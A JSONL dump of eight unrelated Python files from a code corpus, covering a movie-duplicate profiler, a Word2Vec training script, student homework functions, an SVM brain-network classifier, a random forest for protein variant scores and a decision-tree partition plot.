+{"seq_id":"52041810","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Tuneup assignment\"\"\"\n\n__author__ = 'Rob Spears (GitHub: Forty9Unbeaten)'\n\nimport cProfile\nimport pstats\nimport functools\nimport timeit\n\n\ndef profile(func):\n '''A function that can be used as a decorator to measure performance'''\n @functools.wraps(func)\n def pro_wrapper(*args, **kwargs):\n pro = cProfile.Profile()\n pro.enable()\n duplicates = func(*args, **kwargs)\n pro.disable()\n stats = pstats.Stats(pro)\n stats.strip_dirs().sort_stats('cumulative').print_stats()\n return duplicates\n return pro_wrapper\n\n\ndef read_movies(src):\n '''Returns a list of movie titles'''\n print('Reading file: {}'.format(src))\n with open(src, 'r') as f:\n return f.read().splitlines()\n\n\n# uncomment next line to decorate function with time measurement statistics\n@profile\ndef find_duplicate_movies(src):\n '''Returns a list of duplicate movies from a src list'''\n movies = read_movies(src)\n unique = set()\n return set(movie for movie in movies if movie in unique\n or unique.add(movie))\n\n\ndef timeit_helper():\n '''Part A: Obtain some profiling measurements using timeit'''\n\n # change these variables to dictate\n # how many times timeit runs and repeats\n number = 2\n repeat = 3\n\n t = timeit.Timer(stmt='''t.main()''',\n setup='''import tuneup as t''')\n results = t.repeat(number=number, repeat=repeat)\n min_time = min([res/number for res in results])\n print(\n '\\n\\tBest time across {} repeats of {} runs per repeat: {:.3f}'.format(\n repeat, number, min_time)\n )\n\n\ndef main():\n '''Computes a list of duplicate movie entries'''\n result = find_duplicate_movies('movies.txt')\n print('Found {} duplicate movies:'.format(len(result)))\n print('\\n'.join(result))\n\n\nif __name__ == '__main__':\n # uncomment next line to gather time measurements with timeit module\n # timeit_helper()\n main()\n","sub_path":"tuneup.py","file_name":"tuneup.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"472542047","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 27 20:00:24 2018\r\n\r\n@author: YUAN\r\n\"\"\"\r\n\r\nimport os\r\nimport pandas as pd\r\n\r\npath = r\"C:\\Users\\ADM\\Desktop\\UBS Quant Competition\\Price Data\" #文件夹目录\r\nfiles= os.listdir(path) #得到文件夹下的所有文件名称\r\nfactors = {}\r\nfor file in files: #遍历文件夹\r\n if not os.path.isdir(file): #判断是否是文件夹,不是文件夹才打开\r\n factors[file[:-4]] = pd.read_csv(path + \"/\" + file, index_col=0)","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"613642466","text":"import logging\nimport os\nfrom gensim.models import Word2Vec\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nlogging.debug('start')\n# logging.debug()\n# logging.info()\nclass MySentences(object):\n\tdef __init__(self, dirname):\n\t\tself.dirname = dirname\n\n\tdef __iter__(self):\n\t\tfor fname in os.listdir(self.dirname):\n\t\t\tprint (\"- > File name: \"+os.path.join(self.dirname, fname))\n\t\t\tfor line in open(os.path.join(self.dirname, fname)):\n\t\t\t\tyield line.split()\n\nsentences = MySentences('text')\nlens = 0\nfor i, sent in enumerate(sentences):\n\tlens += len(sent)\n\nmodel = Word2Vec.load('model')\nmodel.train(sentences,total_examples=lens, epochs=model.iter)\n\nprint(\" < -o- > vocab length:\")\nprint(len(model.wv.vocab))\n\nmodel.save('model')\n\n\n\n","sub_path":"trainme.py","file_name":"trainme.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"615773147","text":"# globel variable l = 10\n\"\"\"l = 10\ndef shubham(n):\n l = 12 #local variable\n print(n,\"i am shubham\",l)\nshubham(\"great learner\")\nprint(l)\"\"\"\n# Global key\na =89\ndef jha():\n a =10\n def jhaji():\n global a\n a=20\n # print(\"before calling jhaji\",a)\n jhaji()\n print(\"after calling jhaji\",a)\njha()\nprint(a)","sub_path":"global1.py","file_name":"global1.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"24916815","text":"#!/usr/bin/env python\n# HW03_ex06\n# (1) Please comment your code.\n# (2) Please be thoughtful when naming your variables.\n# (3) Please remove development code before submitting.\n################################################################################\n# Exercise 1\n# When you submit only include your final function: compare\n\ndef compare(x,y):\n\tif(x > y): #compare x,y\n\t\treturn 1\n\telif(x ==y):\n\t\treturn 0\n\telse:\n\t\treturn -1\n\t\n\n################################################################################\n# Exercise 2\n# When you submit only include your final function: hypotenuse\n# Do develop incrementally. Do not share here.\nimport math\ndef hypotenuse(side1, side2):\n\thypotenuse_squared = side1** 2 + side2 ** 2 # calculating hypotenuse squared\n\thyp = math.sqrt(hypotenuse_squared) # calculating square root of hypotenuse squared\n\treturn hyp\n\n\n\n\n################################################################################\n# Exercise 3\n# When you submit only include your final function: is_between\n\ndef is_between(x,y,z):\n\tif(x <= y <= z):\n\t\treturn True\n\telse: \n\t\treturn False\n\n\n################################################################################\n# Exercise 6\n# When you submit only include your final function: is_palindrome\n\ndef is_palindrome(s):\n\treversed = s[::-1] #reversing the string\n\tif s == reversed: \n\t\treturn True\n\telse:\n\t\treturn False\n\n\n################################################################################\n# Exercise 7\n# When you submit only include your final function: is_power\n\ndef is_power(a,b):\n\t\tif (a%b == 0 and (a/b) % b == 0):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\n################################################################################\n\ndef main():\n\t\"\"\"Your functions will be called within this function.\"\"\"\n\t############################################################################\n\t# Use this space temporarily to call functions in development:\n\tprint(\"Hello World!\")\n\t\n\n\n\n\n\n\n ############################################################################\n # Uncomment the below to test and before commiting:\n # # Exercise 1\n\t#compare(1,1)\n\t#compare(1,2)\n\t#compare(2,1)\n # # Exercise 2\n\t#hypotenuse(1,1)\n\t#hypotenuse(3,4)\n\t#hypotenuse(1.2,12)\n # # Exercise 3\n\t#is_between(1,2,3)\n\t#is_between(2,1,3)\n\t#is_between(3,1,2)\n\t#is_between(1,1,2)\n # # Exercise 6\n\tis_palindrome(\"Python\")\n\tis_palindrome(\"evitative\")\n\tis_palindrome(\"sememes\")\n\tis_palindrome(\"oooooooooooo\")\n # # Exercise 7\n\tis_power(28,3)\n\tis_power(27,3)\n\tis_power(248832,12)\n\tis_power(248844,12)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"HW03_ex06.py","file_name":"HW03_ex06.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"648523925","text":"\"\"\"\nThis script is used to train an SVM classifier on Changgung datasets, \nand test on Beijing/Cambridge or other datasets.\nOne of the two training groups must be Changgung healthy subjects.\nAll of the training data are the first scan of each patient.\nThe healthy dynamic networks were used to balance positive and negative ratio\n\"\"\"\n\nimport os, json\nimport numpy as np\nimport mmdps_locale\nfrom mmdps.proc import atlas, netattr\nfrom mmdps_util import stats_utils, io_utils, result_utils\nfrom sklearn import svm, model_selection\n\natlasobj = atlas.get('brodmann_lr')\n\n# load specific nets as a list\nChanggungPatientNets = io_utils.loadSpecificNets(mmdps_locale.ChanggungAllFullPath, atlasobj, subjectList = os.path.join(mmdps_locale.ChanggungRootPath, 'CS_subjects.txt'))\nChanggungHealthyNets = io_utils.loadRandomDynamicNets(mmdps_locale.ChanggungAllFullPath, atlasobj, totalNum = len(ChanggungPatientNets), scanList = os.path.join(mmdps_locale.ChanggungRootPath, 'normal_scans.txt'))\n\ntestNets = io_utils.loadSpecificNets(mmdps_locale.ChanggungAllFullPath, atlasobj, subjectList = os.path.join(mmdps_locale.ChanggungRootPath, 'CS_subjects.txt'), timeCase = 2)\n\nprint('len of ChanggungPatientNets: %d' % len(ChanggungPatientNets))\nprint('len of testNets: %d' % len(testNets))\n\n# prepare all training \nsig_connections = stats_utils.filter_sigdiff_connections(ChanggungPatientNets, ChanggungHealthyNets)\nX1 = np.zeros((len(ChanggungHealthyNets), 1)) # healthy\ny1 = -1 * np.ones((len(ChanggungHealthyNets), 1)) # label = -1 for healthy\nX2 = np.zeros((len(ChanggungPatientNets), 1)) # patient\ny2 = np.ones((len(ChanggungPatientNets), 1)) # label = 1 for patients\nZ = np.zeros((len(testNets), 1)) # 3rd party test set\ny3 = np.ones((len(testNets), 1))\nfor c in sig_connections:\n\tnormalCList = result_utils.getAllFCAtIdx(c[0], c[1], ChanggungHealthyNets)\n\tX1 = np.insert(X1, 0, normalCList, axis = 1)\n\tpatientCList = result_utils.getAllFCAtIdx(c[0], c[1], ChanggungPatientNets)\n\tX2 = np.insert(X2, 0, patientCList, axis = 1)\n\ttestList = result_utils.getAllFCAtIdx(c[0], c[1], testNets)\n\tZ = np.insert(Z, 0, testList, axis = 1)\nX = np.concatenate([X1[:, :-1], X2[:, :-1]])\ny = np.concatenate((y1, y2)).ravel()\nZ = Z[:, :-1]\n\n# classifier\nclassifier = svm.SVC(kernel = 'linear')\n\n# train it on the first scans\nclassifier.fit(X, y)\n\n# test it on other dataset\naccuracy = classifier.score(Z, y3)\nprint('Test accuracy: %1.4f' % accuracy)\n","sub_path":"SVM/changgung patient vs others dynamic.py","file_name":"changgung patient vs others dynamic.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"547189228","text":"# Load\nimport sys, os, ast\nsys.path.insert(0, \"src/utilities\")\n\nimport pandas as pd\nimport numpy as np\n\nimport prismml_utilities as prism_utilities\nimport prism_machine_learning as prismml\nimport PrismData as PrismData\n\n# Inputs\nfrom argparse import ArgumentParser\nparser = ArgumentParser(description=\"Select training, validation proteins\")\nparser.add_argument(\"-n\", dest=\"RUN_NAME\", default = \"paper__RF__all__1\", help=\"RUN_NAME\")\nparser.add_argument(\"-l\", dest=\"LINEAR_REGRESSION\", default = False, help=\"Run linear regression model instead of RF model\")\nparser.add_argument(\"-d\", dest=\"DATASET_PATH\", default = \"data/preprocessed.pkl\", help=\"Dataset path\")\nparser.add_argument(\"-s\", dest=\"SUBSET\", default = False, help=\"TREES\")\nparser.add_argument(\"-i\", dest=\"VALID_IDXS\", default = False, help=\"VALID_IDXS\")\nparser.add_argument(\"-j\", dest=\"TRAIN_IDXS\", default = False, help=\"TRAIN_IDXS\")\nparser.add_argument(\"-f\", dest=\"FEATURES\", default = \"all\", help=\"FEATURES\")\nparser.add_argument(\"-t\", dest=\"TREES\", default = 150, help=\"TREES\")\nparser.add_argument(\"-x\", dest=\"EXCLUDE_MISSING\", default=2, help=\"Exclude missing Rosetta values (1), or Rosetta and GEMME (2)\")\nparser.add_argument(\"-v\", dest=\"VERBOSE\", default=0, help=\"Print error messages\")\nargs = parser.parse_args()\nverbose = int(args.VERBOSE)\n\n# Duration\nfrom datetime import datetime\nstart_time = datetime.now()\n\nLINEAR_FLAG = args.LINEAR_REGRESSION\nif LINEAR_FLAG: print(\"Linear regression model set\")\n\n# Generate features\nprint(\"\\nChosen features:\", args.FEATURES)\npreprocessed_path = str(args.DATASET_PATH)\nprint(\"Loading from preprocessed path:\", preprocessed_path)\n\n# Big load script\ndfs_proc, dfs_names, dfs_raw = prismml.generate_load_preprocessed_datasets(\"data/preprocessed/prism*.txt\",\n normalize_mave_only = True,\n preprocessed_path=preprocessed_path)\n\n# Only include rows with present MAVE score\nfor df in dfs_raw: df.dropna(subset = [\"score\"], inplace = True)\nfor df in dfs_proc: df.dropna(subset = [\"score\"], inplace = True)\nfor df_raw, df_proc in zip(dfs_raw, dfs_proc):\n df_proc[\"mave_p0\"] = df_raw[\"mave_p0\"]\n\n# Extra pre-proc\n#dfs_raw_names = dfs_names.copy()\n#dfs_proc_subset = pd.Series(prismml.filter_numeric_fillnans_dfs(dfs_proc))\n\nfrom copy import deepcopy\ndfs_raw_scores = dfs_proc.apply(deepcopy)\nfor i in range(len(dfs_raw_scores)):\n dfs_raw_scores[i][\"score\"] = dfs_raw[i][\"score\"]\n#dfs_raw_scores = pd.Series(prismml.filter_numeric_fillnans_dfs(dfs_raw_scores))\n\n# stats df\nstats_df_all = prismml.generate_stats_df(dfs_proc, dfs_names)\n\n# Extract experiments only with Rosetta and Gemme values above 0.3, and within 0.2 of each other\nif args.SUBSET:\n print(\"\\nExtracting subset ... Only including dataset if ddG OR ddE correlation > 0.3\")\n min_threshold = 0.3\n filtered_names = []\n for i, gem, ros in zip(enumerate(stats_df_all.index), stats_df_all[\"Gemme\"], stats_df_all[\"Rosetta\"]):\n if gem > min_threshold or ros > min_threshold: filtered_names.append(i[1])\n\n def extract_subset(dfs_list, dfs_names, subset):\n return(pd.Series([dfs_list[i] for i in range(len(dfs_names)) if dfs_names[i] in subset]))\n\n dfs_proc_subset = extract_subset(dfs_proc, dfs_names, filtered_names)\n dfs_raw_subset = extract_subset(dfs_raw, dfs_names, filtered_names)\n dfs_raw_scores_subset = extract_subset(dfs_raw_scores, dfs_names, filtered_names)\n dfs_names_subset = extract_subset(dfs_names, dfs_names, filtered_names)\n if verbose >= 1: print(\"\\nExtracted subset ({}):\\n{}\".format(str(len(dfs_names_subset)), dfs_names_subset))\n\nelse:\n dfs_proc_subset = dfs_proc\n dfs_raw_subset = dfs_raw\n dfs_raw_scores_subset = dfs_raw_scores\n dfs_names_subset = dfs_names\n\n#print(\"\\nExtracted subset (\" + len(dfs_names_subset) +\"):\", dfs_names_subset)\n\nif verbose > 1:\n for x, name in zip([dfs_proc_subset, dfs_raw_scores_subset, dfs_names_subset, dfs_raw_subset], [\"dfs_proc_subset\", \"dfs_raw_scores_subset\", \"dfs_names_subset\", \"dfs_raw_subset\"]):\n print(\"\\n\" + name, \"type:\", type(x))\n try: print(\"Len:\", len(x), \"First item shape:\", x[0].shape, type(x[0]))\n except: print(\"Len:\", len(x), \"First item len:\", len(x[0]), type(x[0]))\n\nstats_df_subset = prismml.generate_stats_df(dfs_proc_subset, dfs_names_subset)\n\n# Check if selected specific features\nif args.FEATURES == \"all\": chosen_features_re = \"gemme_aa_p0|gemme_aa_wt_p$|gemme_M_p0|ros_aa_p0|ros_aa_wt_p$|ros_M_p0|mave_wt|mave_any\"\nelse: chosen_features_re = \"|\".join(ast.literal_eval(args.FEATURES))\ninclude = dfs_proc_subset[0].columns.str.contains(\"^score$|\" + chosen_features_re)\n\nchosen_features = dfs_proc[0].columns[include]\ndfs_proc_subset = pd.Series([df[chosen_features] for df in dfs_proc_subset])\ndfs_raw_scores_subset = pd.Series([df[chosen_features] for df in dfs_raw_scores_subset])\nprint(dfs_proc_subset[0].columns)\n\n######\n# ML\n# Load training datasets\n######\n\n# Choose train idxs subset from input args\nif args.VALID_IDXS: valid_ix_list = ast.literal_eval(args.VALID_IDXS)\nelse: valid_ix_list = [0]\nprint(\"valid_ix_list:\", valid_ix_list, type(valid_ix_list))\n\nif args.TRAIN_IDXS: train_ix_list = ast.literal_eval(args.TRAIN_IDXS)\nelse: train_ix_list = list(range(len(dfs_proc_subset)))\nprint(\"train_ix_list (input, before filtering):\", train_ix_list, type(train_ix_list))\n\n\ndef get_dataset(dataset_proc, dataset_raw, dataset_names, chosen_features_re, valid_ix_list):\n # Setup\n train_ix_list = list(range(len(dfs_names_subset)))\n\n # Select features\n include = dataset_proc[0].columns.str.contains(\"^score$|\" + chosen_features_re)\n chosen_features = dataset_proc[0].columns[include]\n\n dataset_proc = pd.Series([df[chosen_features] for df in dataset_proc])\n dataset_raw = pd.Series([df[chosen_features] for df in dataset_raw])\n if verbose: print(dataset_proc[0].columns)\n\n # Numeric values only\n dataset_proc = prismml.filter_numeric_fillnans_dfs(dataset_proc)\n\n # Removal of all proteins by name in train_ix_list\n train_names = prismml.get_proteins_by_idxs(train_ix_list, dataset_names)\n valid_names = prismml.get_proteins_by_idxs(valid_ix_list, dataset_names)\n train_protein_idxs = prismml.get_idxs_by_proteins(train_names, dataset_names)\n\n print(\"Removing validation proteins from training proteins\")\n exclude = np.array(train_names.isin(valid_names), dtype = bool)\n train_ix_list = list(pd.Series(train_ix_list)[~exclude])\n\n train_names = prismml.get_proteins_by_idxs(train_ix_list, dataset_names)\n train_protein_idxs = prismml.get_idxs_by_proteins(train_names, dataset_names)\n\n valid_names = prismml.get_proteins_by_idxs(valid_ix_list, dataset_names)\n if verbose: print(\"Training set:\\n\", train_names, \"\\nValidation set:\\n\", valid_names)\n\n\n # training sets. Remove validation proteins from training set\n train_X, train_y, valid_X, valid_y = prismml.generate_train_valid_set_dfs(dataset_proc, valid_ix_list = valid_ix_list,\n train_ix_list = train_ix_list)\n _, _, valid_X_raw, valid_y_raw = prismml.generate_train_valid_set_dfs(dataset_raw,\n valid_ix_list = valid_ix_list,\n train_ix_list = train_ix_list)\n\n if verbose > 1: print(\"Train/valid x/y\", len(train_X), len(train_y), len(valid_X), len(valid_y))\n\n return(train_X, train_y, valid_X, valid_y_raw)\n\nchosen_features_re = \"ros_aa_p0|ros_aa_wt_p$|ros_M_p0|gemme_aa_p0|gemme_aa_wt_p$|gemme_M_p0|mave_wt|mave_any\"\ntrain_X, train_y, valid_X, valid_y_raw = get_dataset(dfs_proc_subset, dfs_raw_scores_subset, dfs_names_subset, chosen_features_re, valid_ix_list)\n\nif int(args.EXCLUDE_MISSING) >= 1 and \"ros_aa_wt_p\" in train_X.columns:\n print(\"Filtering out missing Rosetta values\")\n print(\"Before:\", train_X.shape, valid_X.shape)\n missing_train = np.array(train_X[\"ros_aa_wt_p\"] == -100, dtype = bool)\n train_X, train_y = train_X[~missing_train], train_y[~missing_train]\n missing_val = np.array(valid_X[\"ros_aa_wt_p\"] == -100, dtype = bool)\n valid_X, valid_y_raw = valid_X[~missing_val], valid_y_raw[~missing_val]\n print(\"After:\", train_X.shape, valid_X.shape)\n\nif int(args.EXCLUDE_MISSING) >= 2 and \"gemme_aa_wt_p\" in train_X.columns:\n print(\"Filtering out missing GEMME values\")\n print(\"Before:\", train_X.shape, valid_X.shape)\n missing_train = np.array(train_X[\"gemme_aa_wt_p\"] == -100, dtype = bool)\n train_X, train_y = train_X[~missing_train], train_y[~missing_train]\n missing_val = np.array(valid_X[\"gemme_aa_wt_p\"] == -100, dtype = bool)\n valid_X, valid_y_raw = valid_X[~missing_val], valid_y_raw[~missing_val]\n print(\"After:\", train_X.shape, valid_X.shape)\n\n# Set model\nif LINEAR_FLAG:\n print(\"Linear regression model set\")\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\nelse:\n print(\"Random Forest model set\")\n from sklearn.ensemble import RandomForestRegressor\n model = RandomForestRegressor(n_estimators = int(args.TREES), max_features = \"sqrt\", min_samples_leaf=15)\n\n# Train model\nmodel.fit(train_X, train_y)\n\n# Dump model to file\nfrom joblib import dump, load\ndump(model, \"trained_RF_model.joblib\")\n\n# Evaluate\nprint(\"Train performance spearman (norm):\", prismml.test_performance_continuous(model, train_X, train_y, include = \"spearman\"))\nprint(\"Valid performance spearman (raw):\", prismml.test_performance_continuous(model, valid_X, valid_y_raw, include = \"spearman\"))\nprint(\"Valid performance spearman (raw -> recording...):\", prismml.test_performance_continuous(model, valid_X, valid_y_raw, include = \"spearman\"))\n\n# Record performance\nexit_value = prism_utilities.csv_save_record_performance(model, train_X, train_y, valid_X, valid_y_raw, dfs_raw_scores_subset, dfs_names_subset,\n valid_ix_list, train_ix_list, stats_df_subset, chosen_features, start_time,\n RUN_NAME = args.RUN_NAME, verbose = 1)\n\nif exit_value != True:\n print(\"ERROR: csv_save_record_performance exited with error code\")\n","sub_path":"2021/ML-variants-Hoie-et-al/src/RandomForest_model.py","file_name":"RandomForest_model.py","file_ext":"py","file_size_in_byte":10272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"559610505","text":"import math\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport numpy as np\nimport sys\n\nimport os\nparent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, parent_dir)\nimport addtext\nimport linegraph\nimport patchplotting\n\n\ndef main(figureSaveLocation):\n \"\"\"Create two images that demonstrate the partition induced by a decision tree.\n\n @type figureSaveLocation - str\n @use figureSaveLocation - The location where the figure will be saved.\n \"\"\"\n\n # Define the decision tree split points and partitions.\n splitValues = [5, 3, 6, 2, 8, 8, 7]\n splitVariables = [r'$x$', r'$y$', r'$y$', r'$x$', r'$y$', r'$x$', r'$x$']\n nodeLabels = splitVariables + [str(i) for i in range(len(splitValues) + 1)]\n partitionLabels = [str(i) for i in range(len(splitValues) + 1)]\n splitValues = splitValues + ([None] * (len(splitValues) + 1)) # Pad out the splitValues with empty values for the leaves.\n splitVariables = splitVariables + ([None] * (len(splitValues) + 1)) # Pad out the splitVariables with empty values for the leaves.\n\n # Define the axes sizes.\n axisMinValue = 0.0\n axisMaxValue = 10.0\n\n # Define the decision tree node sizes and positions.\n nodeWidth = 1.0\n nodeHeight = 1.0\n gapBetweenLevels = 1.0\n gapBetweenCousins = 0.5\n nodeDepths = [int(math.log(i+1,2)) for i in range(len(splitValues))]\n maxDepth = max(nodeDepths)\n nodesAtDepth = [(2**nodeDepths[i], nodeDepths[:i].count(nodeDepths[i]) + 1) for i in range(len(nodeDepths))] # The depth of the node along with the position on the row (leftmost is 1).\n nodeCenterXValues = []\n nodeCenterYValues = [axisMaxValue - (i * nodeHeight + ((i + 1) * gapBetweenLevels) + (nodeHeight / 2)) for i in nodeDepths]\n for i in range(len(splitValues)):\n splits = [(axisMaxValue / nodesAtDepth[i][0]) * j for j in range(nodesAtDepth[i][0] + 1)]\n positions = [(splits[j] + splits[j+1]) / 2 for j in range(nodesAtDepth[i][0])]\n nodeCenterXValues.append(positions[nodesAtDepth[i][1] - 1])\n treeEdgesXValues = []\n treeEdgesYValues = []\n treeEdgeLabels = []\n for i in range(len(splitValues)):\n if not splitValues[i]:\n # If i is the index of a leaf node, then continue as the leaf does not hold any information about the partition.\n continue\n leftChildIndex = int((i * 2) + 1)\n rightChildIndex = int((i * 2) + 2)\n treeEdgesXValues += [[nodeCenterXValues[i], nodeCenterXValues[leftChildIndex]], [nodeCenterXValues[i], nodeCenterXValues[rightChildIndex]]]\n treeEdgesYValues += [[nodeCenterYValues[i], nodeCenterYValues[leftChildIndex]], [nodeCenterYValues[i], nodeCenterYValues[rightChildIndex]]]\n treeEdgeLabels += [r'$\\leq$' + str(splitValues[i]), r'$>$' + str(splitValues[i])]\n edgeCenterXValues = [sum(i) / 2 for i in treeEdgesXValues]\n edgeCenterXValues = [edgeCenterXValues[i] + 0.5 if i % 2 else edgeCenterXValues[i] - 0.5 for i in range(len(edgeCenterXValues))]\n edgeCenterYValues = [sum(i) / 2 for i in treeEdgesYValues]\n\n # Determine the partitions used, and the locatations for the labels of the partitions.\n partitionXValues = []\n partitionYValues = []\n partitionWidths = []\n partitionHeights = []\n partitionLabelXValues = []\n partitionLabelYValues = []\n for i in range(len(splitValues)):\n if not splitValues[i]:\n # If i is the index of a leaf node, then continue as the leaf does not hold any information about he partition.\n continue\n\n valueOfI = splitValues[i]\n variableOfI = splitVariables[i]\n\n # Determine the starting bounds for the partition rectangle.\n currentVarLessThan = axisMaxValue\n currentVarMoreThan = axisMinValue\n otherVarLessThan = axisMaxValue\n otherVarMoreThan = axisMinValue\n\n # Determine if the current node is a leaf node (i.e. it has no children).\n isLeaf = False\n leftChildIndex = int((i * 2) + 1)\n if (not splitValues[leftChildIndex]):\n # If the left child does not exist, then the current node is the parent of two leaves\n # (as each node either has two children (internal node) or none (leaf node)).\n currentNodeIndex = i\n while currentNodeIndex > 0:\n # Loop through all the ancestors of the current node, and determine the partition that they induce.\n currentNodeIsLeftChild = True if currentNodeIndex % 2 == 1 else False\n if currentNodeIsLeftChild:\n parentNodeIndex = int((currentNodeIndex - 1) / 2)\n currentNodeIndex = parentNodeIndex\n else:\n parentNodeIndex = int((currentNodeIndex - 2) / 2)\n currentNodeIndex = parentNodeIndex\n\n parentNodeVariable = splitVariables[parentNodeIndex]\n parentNodeValue = splitValues[parentNodeIndex]\n if parentNodeVariable != variableOfI:\n if currentNodeIsLeftChild:\n otherVarLessThan = min(otherVarLessThan, parentNodeValue)\n else:\n otherVarMoreThan = max(otherVarMoreThan, parentNodeValue)\n else:\n if currentNodeIsLeftChild:\n currentVarLessThan = min(currentVarLessThan, parentNodeValue)\n else:\n currentVarMoreThan = max(currentVarMoreThan, parentNodeValue)\n if variableOfI == r'$x$':\n partitionXValues += [currentVarMoreThan, valueOfI]\n partitionYValues += [otherVarMoreThan, otherVarMoreThan]\n height = otherVarLessThan - otherVarMoreThan\n partitionWidths += [valueOfI - currentVarMoreThan, currentVarLessThan - valueOfI]\n partitionHeights += [height, height]\n partitionLabelXValues.append((valueOfI + currentVarMoreThan) / 2.0)\n partitionLabelYValues.append((otherVarLessThan + otherVarMoreThan) / 2.0)\n partitionLabelXValues.append((currentVarLessThan + valueOfI) / 2.0)\n partitionLabelYValues.append((otherVarLessThan + otherVarMoreThan) / 2.0)\n else:\n partitionXValues += [otherVarMoreThan, otherVarMoreThan]\n partitionYValues += [currentVarMoreThan, valueOfI]\n width = otherVarLessThan - otherVarMoreThan\n partitionWidths += [width, width]\n partitionHeights += [valueOfI - currentVarMoreThan, currentVarLessThan - valueOfI]\n partitionLabelXValues.append((otherVarLessThan + otherVarMoreThan) / 2.0)\n partitionLabelYValues.append((valueOfI + currentVarMoreThan) / 2.0)\n partitionLabelXValues.append((otherVarLessThan + otherVarMoreThan) / 2.0)\n partitionLabelYValues.append((currentVarLessThan + valueOfI) / 2.0)\n\n # Create the plot for the decision tree.\n currentFigure = plt.figure()\n gsTree = gridspec.GridSpec(10, 10)\n gsTree.update(left=0, right=1, bottom=0, top=1, wspace=0.05)#, hspace=0.05)\n treePlot = plt.subplot(gsTree[1:-1, 1:-1])\n treePlot.set_xlim(left=axisMinValue, right=axisMaxValue)\n treePlot.set_ylim(bottom=axisMinValue, top=axisMaxValue)\n nodes = [patches.Rectangle((nodeCenterXValues[i] - (nodeWidth / 2), nodeCenterYValues[i] - (nodeHeight / 2)), nodeWidth, nodeHeight) if nodeDepths[i] < maxDepth\n else patches.Circle((nodeCenterXValues[i], nodeCenterYValues[i]), nodeWidth / 2)\n for i in range(len(nodeDepths))]\n patchplotting.graphGeneration(nodes, currentFigure=currentFigure, faceColors=['white'] * len(nodes), zorders=[-1])\n addtext.graphGeneration(nodeCenterXValues, nodeCenterYValues, nodeLabels, currentFigure=currentFigure, sizes=[30] * len(nodeLabels), zorders=list(range(len(nodeLabels))))\n linegraph.graphGeneration(treeEdgesXValues, treeEdgesYValues, currentFigure=currentFigure, markerSizes=[0] * len(treeEdgesYValues), zorders=[-len(nodes)])\n addtext.graphGeneration(edgeCenterXValues, edgeCenterYValues, treeEdgeLabels, currentFigure=currentFigure, sizes=[15] * len(treeEdgeLabels), zorders=list(range(len(treeEdgeLabels))))\n removeTickMarks(treePlot, xAxis=True, yAxis=True)\n plt.savefig(figureSaveLocation, bbox_inches='tight', transparent=True)\n\n # Create the plot for the feature space partition.\n currentFigure = plt.figure()\n gsPartition = gridspec.GridSpec(10, 10)\n gsPartition.update(left=0, right=1, bottom=0, top=1, wspace=0.05)#, hspace=0.05)\n partitionPlot = plt.subplot(gsPartition[1:-1, 1:-1])\n partitionPlot.set_xlim(left=axisMinValue, right=axisMaxValue)\n partitionPlot.set_ylim(bottom=axisMinValue, top=axisMaxValue)\n rectangles = [patches.Rectangle((partitionXValues[i], partitionYValues[i]), partitionWidths[i], partitionHeights[i]) for i in range(len(partitionXValues))]\n patchplotting.graphGeneration(rectangles, currentFigure=currentFigure, faceColors=['white'] * len(rectangles), zorders=[-1])\n addtext.graphGeneration(partitionLabelXValues, partitionLabelYValues, partitionLabels, currentFigure=currentFigure, sizes=[20] * len(partitionLabels), zorders=list(range(len(partitionLabels))))\n setLabels(partitionPlot, xLabel=r'$x$', yLabel=r'$y$', yRotation=0)\n partitionPlot.xaxis.label.set_size(30)\n partitionPlot.yaxis.label.set_size(30)\n partitionPlot.set_xticks(range(int(axisMaxValue) + 1))\n partitionPlot.set_yticks(range(int(axisMaxValue) + 1))\n plt.savefig(figureSaveLocation + 'Partitions', bbox_inches='tight', transparent=True)\n plt.show()\n\ndef setLabels(axes, xLabel='', xRotation=0, yLabel='', yRotation=0):\n \"\"\"Set the X and Y labels of the axes.\n \"\"\"\n\n axes.set_xlabel(xLabel, rotation=xRotation)\n axes.set_ylabel(yLabel, rotation=yRotation)\n\ndef hideAxesLabelling(axes, xAxis=False, yAxis=False):\n \"\"\"Hides all tick marks, tick labels, axis labels, etc.\n \"\"\"\n\n if xAxis:\n axes.xaxis.set_visible(False)\n if yAxis:\n axes.yaxis.set_visible(False)\n\ndef removeTickMarks(axes, xAxis=False, yAxis=False):\n \"\"\"Removes all tick marks.\n \"\"\"\n\n if xAxis:\n axes.set_xticks([])\n if yAxis:\n axes.set_yticks([])\n\ndef removeTickLabels(axes, xAxis=False, yAxis=False):\n \"\"\"Removes that tick labels.\n \"\"\"\n\n if xAxis:\n axes.set_xticklabels([])\n if yAxis:\n axes.set_yticklabels([])\n\n\nif __name__ == '__main__':\n main(sys.argv[1])","sub_path":"src/examples/DecisionTreePartitions.py","file_name":"DecisionTreePartitions.py","file_ext":"py","file_size_in_byte":10614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
